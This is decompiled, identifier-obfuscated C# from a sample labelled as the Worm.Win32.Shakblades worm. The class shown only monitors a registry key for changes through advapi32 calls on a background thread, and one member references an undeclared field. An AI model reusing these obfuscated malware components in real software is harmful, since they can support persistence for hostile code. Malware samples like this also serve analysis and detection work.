// Decompiled with JetBrains decompiler // Type: Ҧ߲๒ʽ໙ୄᴘ.ᘽƭ // Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe using Microsoft.Win32; using System; using System.ComponentModel; using System.IO; using System.Runtime.InteropServices; using System.Threading; namespace Ҧ߲๒ʽ໙ୄᴘ { public class ᘽƭ : IDisposable { private const int ሜኯᴭၚ໓ম\u1B7Eıᗝ = 1; private const int \u0D58Ꮈೇ\u00AEႍ = 16; private const int \u08D2ᰆ = 131072; private static readonly IntPtr ốኯՕằቜ\u0FC9ˡ = new IntPtr(int.MinValue); private static readonly IntPtr ᄉǹ\u05FFఔ = new IntPtr(-2147483647); private static readonly IntPtr \u1C31᪱ࢢ = new IntPtr(-2147483646); private static readonly IntPtr ምࢨញഥ = new IntPtr(-2147483645); private static readonly IntPtr ৰ\u139Fᙇ = new IntPtr(-2147483644); private static readonly IntPtr yଳጻഷቝ = new IntPtr(-2147483643); private static readonly IntPtr \u176D᧒ޢਕೆጾૐ = new IntPtr(-2147483642); private IntPtr \u0029Ѽ\u09D1ᚻ\u08BFჶ; private string ˣཐᛮ; private object ϒ\u0EDBไᏧ\u0CC5ᒎႛᬛ = new object(); private Thread ݍࠗ\u0B98\u0FF8᳡ષρᎻ; private ManualResetEvent \u08F1ᤜᬯ = new ManualResetEvent(false); private \u187Bȸº᭰\u09FC Ẏᛑደ = \u187Bȸº᭰\u09FC.ഴᏮ\u18ABٞᴑ\u1C96ᦁྌᚳ | \u187Bȸº᭰\u09FC.ᰃ | \u187Bȸº᭰\u09FC.ཅ\u000A | \u187Bȸº᭰\u09FC.ẟᛗᚕ\u0C11ᘾ; public ᘽƭ(RegistryKey registryKey) => this.\u05F8ᨅ᩵۷ኝ᭯(registryKey.Name); public ᘽƭ(string name) => this.\u05F8ᨅ᩵۷ኝ᭯(name); public ᘽƭ(RegistryHive registryHive, string subKey) => this.ᳶ\u1A8Cˉၕᖁ\u001Eඹᶋ(registryHive, subKey); [DllImport("advapi32.dll", EntryPoint = "RegOpenKeyEx", SetLastError = true)] private static extern int ᴊזى\u0C70\u0DCE\u0DF4( IntPtr _param0, string _param1, uint ᅾፂÇ៌ڔᶷॠᯊ, int _param3, out IntPtr _param4); [DllImport("advapi32.dll", EntryPoint = "RegNotifyChangeKeyValue", SetLastError = true)] private static extern int \u0731ᄦѧ\u08D2װ\u002Fᇣ( IntPtr _param0, bool _param1, \u187Bȸº᭰\u09FC _param2, IntPtr _param3, bool _param4); [DllImport("advapi32.dll", EntryPoint = "RegCloseKey", SetLastError = true)] private static extern int ᦍ\u0008Տ\u0DF9ទƕ\u02FD(IntPtr _param0); public event EventHandler ဧŕᬐ\u0AD4߭; protected virtual void OnRegChanged() { EventHandler eventHandler = this.\u0BF1; if (eventHandler == null) return; eventHandler((object) this, (EventArgs) null); } public event ErrorEventHandler ᑂϦڢྜƘ; protected virtual void OnError(Exception e) { } public void Dispose() { this.ᑺᆊᥖᅁỸਇয\u191F(); GC.SuppressFinalize((object) this); } public \u187Bȸº᭰\u09FC ܜᛓѕଢ਼֨᳑ᐱ { get => this.Ẏᛑደ; set { lock (this.ϒ\u0EDBไᏧ\u0CC5ᒎႛᬛ) this.Ẏᛑደ = value; } } private void ᳶ\u1A8Cˉၕᖁ\u001Eඹᶋ(RegistryHive ᜥᡉԭᒧך, string ධᜁᄜᅩᖙᙜ) { switch (ᜥᡉԭᒧך) { case RegistryHive.ClassesRoot: this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ốኯՕằቜ\u0FC9ˡ; break; case RegistryHive.CurrentUser: this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ᄉǹ\u05FFఔ; break; case RegistryHive.LocalMachine: this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.\u1C31᪱ࢢ; break; case RegistryHive.Users: this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ምࢨញഥ; break; case RegistryHive.PerformanceData: this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ৰ\u139Fᙇ; break; case RegistryHive.CurrentConfig: this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.yଳጻഷቝ; break; case RegistryHive.DynData: this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.\u176D᧒ޢਕೆጾૐ; break; } this.ˣཐᛮ = ධᜁᄜᅩᖙᙜ; } private void \u05F8ᨅ᩵۷ኝ᭯(string _param1) { string[] strArray = _param1.Split('\\'); switch (strArray[0]) { case "HKEY_CLASSES_ROOT": case "HKCR": this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ốኯՕằቜ\u0FC9ˡ; break; case "HKEY_CURRENT_USER": case "HKCU": this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ᄉǹ\u05FFఔ; break; case "HKEY_LOCAL_MACHINE": case "HKLM": this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.\u1C31᪱ࢢ; break; case "HKEY_USERS": this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ምࢨញഥ; break; case "HKEY_CURRENT_CONFIG": this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.yଳጻഷቝ; break; default: this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = IntPtr.Zero; break; } this.ˣཐᛮ = string.Join("\\", strArray, 1, strArray.Length - 1); } public bool Ꮹ᷄ᡊ\u008Dᐳᆉܳ => this.ݍࠗ\u0B98\u0FF8᳡ષρᎻ != null; public void ůߝᨍ() { lock (this.ϒ\u0EDBไᏧ\u0CC5ᒎႛᬛ) { if (this.Ꮹ᷄ᡊ\u008Dᐳᆉܳ) return; this.\u08F1ᤜᬯ.Reset(); this.ݍࠗ\u0B98\u0FF8᳡ષρᎻ = new Thread(new ThreadStart(this.ဖཀྵ\u0F02̢᠗Ôଚ᭗ɭ)); this.ݍࠗ\u0B98\u0FF8᳡ષρᎻ.IsBackground = true; this.ݍࠗ\u0B98\u0FF8᳡ષρᎻ.Start(); } } public void ᑺᆊᥖᅁỸਇয\u191F() { lock (this.ϒ\u0EDBไᏧ\u0CC5ᒎႛᬛ) { Thread ݍࠗ᳡ષρᎻ = this.ݍࠗ\u0B98\u0FF8᳡ષρᎻ; if (ݍࠗ᳡ષρᎻ == null) return; this.\u08F1ᤜᬯ.Set(); ݍࠗ᳡ષρᎻ.Join(); } } private void ဖཀྵ\u0F02̢᠗Ôଚ᭗ɭ() { try { this.ۺ៝\u05BE᭬ქ(); } catch (Exception ex) { this.OnError(ex); } this.ݍࠗ\u0B98\u0FF8᳡ષρᎻ = (Thread) null; } private void ۺ៝\u05BE᭬ქ() { IntPtr num; int error1 = ᘽƭ.ᴊזى\u0C70\u0DCE\u0DF4(this.\u0029Ѽ\u09D1ᚻ\u08BFჶ, this.ˣཐᛮ, 0U, 131089, out num); if (error1 != 0) throw new Win32Exception(error1); try { AutoResetEvent autoResetEvent = new AutoResetEvent(false); WaitHandle[] waitHandles = new WaitHandle[2] { (WaitHandle) autoResetEvent, (WaitHandle) this.\u08F1ᤜᬯ }; while (!this.\u08F1ᤜᬯ.WaitOne(0, true)) { int error2 = ᘽƭ.\u0731ᄦѧ\u08D2װ\u002Fᇣ(num, true, this.Ẏᛑደ, autoResetEvent.SafeWaitHandle.DangerousGetHandle(), true); if (error2 != 0) throw new Win32Exception(error2); if (WaitHandle.WaitAny(waitHandles) == 0) this.OnRegChanged(); } } finally { if (num != IntPtr.Zero) ᘽƭ.ᦍ\u0008Տ\u0DF9ទƕ\u02FD(num); } } } }